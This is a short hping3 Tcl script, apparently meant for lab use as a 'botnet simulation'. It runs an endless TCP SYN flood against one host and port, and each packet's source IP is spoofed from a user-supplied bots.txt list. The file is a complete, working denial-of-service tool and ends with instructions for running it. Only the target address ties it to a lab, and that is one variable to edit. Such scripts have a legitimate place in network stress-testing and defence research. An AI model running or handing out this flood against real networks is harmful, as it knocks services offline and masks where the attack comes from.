# custom_random_ip_spoofing.htcl
# Flood with user-defined spoofed source IPs (botnet simulation)

set bots_file "bots.txt"
set dst_ip "192.168.100.2"
set dst_port 50001
set window 8192
set seq 0
set count 0

# Read bots.txt and build bot_ips list
set bot_ips {}
set fh [open $bots_file r]
while {[gets $fh line] >= 0} {
    set ip [string trim $line]
    if {$ip ne ""} {
        lappend bot_ips $ip
    }
}
close $fh

if {[llength $bot_ips] == 0} {
    puts "Error: No bot IPs loaded from $bots_file"
    exit 1
}

proc random_bot_ip {} {
    global bot_ips
    set idx [expr {int(rand()*[llength $bot_ips])}]
    return [lindex $bot_ips $idx]
}

# Function to generate random source port (1024–65535)
proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    set saddr [random_bot_ip]
    set sport [random_port]
    # TCP SYN packet: spoofed source IP from bots.txt
    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+tcp(sport=$sport,dport=$dst_port,flags=s,win=$window,seq=$seq)"
    hping send $pkt
    incr count
    # Print every 1000 packets sent
    if {[expr {$count % 1000}] == 0} {
        puts "$count packets sent (random spoofed IPs from bots.txt)..."
    }
}

# To run: sudo hping3 exec custom_random_ip_spoofing.htcl
# File bots.txt must be in the same directory, with one IP per line